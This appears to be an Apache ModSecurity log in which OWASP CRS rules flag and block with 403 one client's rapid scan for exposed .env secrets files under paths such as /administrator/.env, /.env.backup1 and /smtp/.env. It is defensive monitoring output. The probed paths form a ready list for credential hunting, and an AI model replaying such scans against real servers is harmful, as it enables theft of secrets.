[Mon May 11 18:03:30.477733 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/administrator/.env"] [unique_id "agH90kWKUxpmnkK7zHyiJgAAAQ4"]
[Mon May 11 18:03:30.477999 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/administrator/.env"] [unique_id "agH90kWKUxpmnkK7zHyiJgAAAQ4"]
[Mon May 11 18:03:30.478397 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH90kWKUxpmnkK7zHyiJgAAAQ4"]
[Mon May 11 18:03:31.006697 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/psnlink/.env"] [unique_id "agH900WKUxpmnkK7zHyiKAAAAQ4"]
[Mon May 11 18:03:31.006925 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/psnlink/.env"] [unique_id "agH900WKUxpmnkK7zHyiKAAAAQ4"]
[Mon May 11 18:03:31.007216 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH900WKUxpmnkK7zHyiKAAAAQ4"]
[Mon May 11 18:03:31.261268 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/exapi/.env"] [unique_id "agH900WKUxpmnkK7zHyiKgAAAQ4"]
[Mon May 11 18:03:31.261560 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/exapi/.env"] [unique_id "agH900WKUxpmnkK7zHyiKgAAAQ4"]
[Mon May 11 18:03:31.261910 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH900WKUxpmnkK7zHyiKgAAAQ4"]
[Mon May 11 18:03:31.565675 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sitemaps/.env"] [unique_id "agH900WKUxpmnkK7zHyiKwAAAQ4"]
[Mon May 11 18:03:31.565983 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sitemaps/.env"] [unique_id "agH900WKUxpmnkK7zHyiKwAAAQ4"]
[Mon May 11 18:03:31.566381 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH900WKUxpmnkK7zHyiKwAAAQ4"]
[Mon May 11 18:03:31.825222 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.backup1"] [unique_id "agH900WKUxpmnkK7zHyiLQAAAQ4"]
[Mon May 11 18:03:31.825505 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.backup1"] [unique_id "agH900WKUxpmnkK7zHyiLQAAAQ4"]
[Mon May 11 18:03:31.825797 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH900WKUxpmnkK7zHyiLQAAAQ4"]
[Mon May 11 18:03:32.069194 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.backup2"] [unique_id "agH91EWKUxpmnkK7zHyiLwAAAQ4"]
[Mon May 11 18:03:32.069559 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.backup2"] [unique_id "agH91EWKUxpmnkK7zHyiLwAAAQ4"]
[Mon May 11 18:03:32.069857 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91EWKUxpmnkK7zHyiLwAAAQ4"]
[Mon May 11 18:03:32.332276 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/logs/.env"] [unique_id "agH91EWKUxpmnkK7zHyiMAAAAQ4"]
[Mon May 11 18:03:32.332509 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/logs/.env"] [unique_id "agH91EWKUxpmnkK7zHyiMAAAAQ4"]
[Mon May 11 18:03:32.332862 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91EWKUxpmnkK7zHyiMAAAAQ4"]
[Mon May 11 18:03:32.496507 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cache/.env"] [unique_id "agH91EWKUxpmnkK7zHyiMQAAAQ4"]
[Mon May 11 18:03:32.496737 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cache/.env"] [unique_id "agH91EWKUxpmnkK7zHyiMQAAAQ4"]
[Mon May 11 18:03:32.497015 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91EWKUxpmnkK7zHyiMQAAAQ4"]
[Mon May 11 18:03:32.708307 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mailer/.env"] [unique_id "agH91EWKUxpmnkK7zHyiMgAAAQ4"]
[Mon May 11 18:03:32.708526 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mailer/.env"] [unique_id "agH91EWKUxpmnkK7zHyiMgAAAQ4"]
[Mon May 11 18:03:32.708814 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91EWKUxpmnkK7zHyiMgAAAQ4"]
[Mon May 11 18:03:32.996664 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mail/.env"] [unique_id "agH91EWKUxpmnkK7zHyiMwAAAQ4"]
[Mon May 11 18:03:32.996899 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mail/.env"] [unique_id "agH91EWKUxpmnkK7zHyiMwAAAQ4"]
[Mon May 11 18:03:32.997196 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91EWKUxpmnkK7zHyiMwAAAQ4"]
[Mon May 11 18:03:33.214425 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/email/.env"] [unique_id "agH91UWKUxpmnkK7zHyiNQAAAQ4"]
[Mon May 11 18:03:33.214647 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/email/.env"] [unique_id "agH91UWKUxpmnkK7zHyiNQAAAQ4"]
[Mon May 11 18:03:33.214940 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91UWKUxpmnkK7zHyiNQAAAQ4"]
[Mon May 11 18:03:33.391090 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/smtp/.env"] [unique_id "agH91UWKUxpmnkK7zHyiNgAAAQ4"]
[Mon May 11 18:03:33.391348 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/smtp/.env"] [unique_id "agH91UWKUxpmnkK7zHyiNgAAAQ4"]
[Mon May 11 18:03:33.391637 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91UWKUxpmnkK7zHyiNgAAAQ4"]
[Mon May 11 18:03:33.559047 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mailing/.env"] [unique_id "agH91UWKUxpmnkK7zHyiNwAAAQ4"]
[Mon May 11 18:03:33.559290 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mailing/.env"] [unique_id "agH91UWKUxpmnkK7zHyiNwAAAQ4"]
[Mon May 11 18:03:33.559566 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH91UWKUxpmnkK7zHyiNwAAAQ4"]
[Mon May 11 18:03:33.731196 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/notifications/.env"] [unique_id "agH91UWKUxpmnkK7zHyiOQAAAQ4"]
